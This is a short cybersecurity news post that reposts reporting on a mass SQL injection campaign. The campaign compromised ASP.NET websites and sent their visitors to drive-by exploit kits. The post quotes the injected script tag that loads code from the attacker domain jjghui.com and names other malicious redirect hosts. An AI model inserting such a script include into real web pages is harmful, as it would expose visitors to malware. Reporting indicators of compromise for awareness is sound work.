An infection that causes poorly configured websites to silently bombard visitors with malware attacks has hit almost 614,000 webpages, Google searches show.
The mass infection, which redirects users to a site exploiting old versions of Oracle's Java, Adobe's Flash player and various browsers, was first disclosed by Armorize on Wednesday. At the time, it appeared to affect about 180,000 pages.
By time of writing on Friday, the initial attack and a follow-on exploit has spread to 613,890 combined pages. The SQL injection attack mostly exploits websites running Microsoft's ASP.Net web application framework.
The infection injects code into websites operated by restaurants, hospitals, and other small businesses and plants an invisible link in visitors' browsers to sites including jjghui.com and nbnjkl.com. Those sites in turn redirected to several other websites that include highly obfuscated code. At the end of the line is a cocktail of attacks that exploit known vulnerabilities in Java and the other targeted programs. Computers running unpatched versions are then commandeered. Servers in the attack used IP addresses based in the US and Russia.
To Download the Script Click Here
The scripts causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu. Multiple browser-based drive-by download exploits are served depending on the visiting browser. In a drive-by download attack, visitors who navigate to the infected websites will be installed with malware on their machines without their knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).
This wave of mass injection incident is targeting ASP ASP.NET websites. Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.
This wave of mass injection incident is targeting ASP ASP.NET websites. Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.
ASP and ASP.NET websites are injected with the following script (Text is Here):
<script src=http://jjghui.com/urchin.js></script>
<script src=http://jjghui.com/urchin.js></script>
-News Source (The Register & Armorize Blog)
LINK TO OUR HOME PAGE :
Voice Of GREYHAT is a non-profit Organization propagating news specifically related with Cyber security threats, Hacking threads and issues from all over the spectrum. The news provided by us on this site is gathered from various Re-Sources. if any person have some FAQ's in their mind they can Contact Us. Also you can read our Privacy Policy for more info.
Thank You !
-Team VOGH
If you enjoyed VOGH News, Articles Then Do Make sure you to Subscribe Our RSS feed. Stay Tuned with VOGH and get Updated about Cyber Security News, Hacking Threads and Lots More. All our Articles and Updates will directly be sent to Your Inbox. Thank You!
-Team VOGH
Categories:
security-news
,
vulnerablity
